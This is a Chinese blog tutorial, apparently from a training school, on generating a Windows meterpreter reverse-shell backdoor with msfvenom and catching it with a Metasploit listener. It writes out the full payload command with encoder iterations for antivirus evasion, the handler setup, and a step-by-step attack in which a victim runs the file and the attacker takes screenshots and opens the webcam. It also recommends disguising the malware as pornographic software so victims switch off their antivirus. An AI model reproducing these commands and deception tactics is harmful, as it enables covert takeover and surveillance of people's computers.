Msfvenom建立后门程序指令及开启监听

  • Post author:
  • Post category:其他




一、使用场景介绍

在我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。

客户端渗透技巧,通常用户的计算机都安装了安全软件,一般我们生成的恶意程序都会被检测,所以我们所设计的恶意软件可以利用人的劣根性,比如我们将恶意软件或网站伪装成色情软件或网站,这样目标会认为他本身就是不好的软件被安全软件检测是很正常的事情,如果他安耐不住关闭安全防护软件执意要运行恶意程序,那么他就中招了。当然这种取巧的办法并不能解决所有问题,我们需要利用免杀来躲避安全软件的查杀。



二、利用方式

1、利用Metasploit渗透测试框架中Msfvenom组件创建后门程序,将后门程序伪装成其他的正常小程序,比如起个具有高吸引力和高诱惑力的名字。

2、将该后门程序发布在相关的网站平台或者直接通过某种合理的方式发送至受害者的电脑中。

3、在kali本地端开启监听功能。

4、诱导用户点击并出发该后门程序,kali端即显示受害者上线,可获取受害者电脑权限,可执行恶意操作。



三、利用Msfvenom创建后门程序


msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.85.176 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/test1.exe

  • 参数说明


    -a:

    指定架构如x86 x64。x86代表32位,x64代表64位。32位软件可以在64位系统上运行。所以我们生成32位的后门,这样在32位和64位系统中都可以使用。


    –platform:

    指定平台,这里选择windows,通过–l platforms可以查看所有支持的平台。


    -p:

    设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-l payloads查看所有攻击载荷。

    **LHOST:**目标主机执行程序后连接我们Kali的地址LPORT目标主机执行程序后连接我们Kali的端口


    -b:

    去掉坏字符,坏字符会影响payload 正常执行。

    请添加图片描述


    后门程序生成


    在这里插入图片描述



四、开启监听模块

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > show options

  • 1、初始化数据库

    在这里插入图片描述
  • 2、通过msfconsole进入Metasploit

    在这里插入图片描述
  • 3、使用exploit模块并设置攻击载荷

    在这里插入图片描述
  • 4、set lhost 192.168.85.176

    在这里插入图片描述
  • 5、exploit

    在这里插入图片描述



五、受害者下载并触发

  • 1、这里实验环境中通过kali的apache服务提供下载窗口。

    在这里插入图片描述
  • 2、双击运行test1.exe后门程序

    在这里插入图片描述



六、exploit成功,已获取对方权限

  • 1、已监听到对方上线,已获取对方权限。

    在这里插入图片描述
    * 2、获取帮助信息

    在这里插入图片描述

    这里通过metasploit工具中自带的指令集来执行操作,包括核心指令、文件操作指令等。。。
  • 3、获取屏幕截图

    在这里插入图片描述
  • 4、调用对方摄像头

    在这里插入图片描述


—————————————-武汉艾迪飞教育—————————————————–



版权声明:本文为Dreamsi_zhang原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。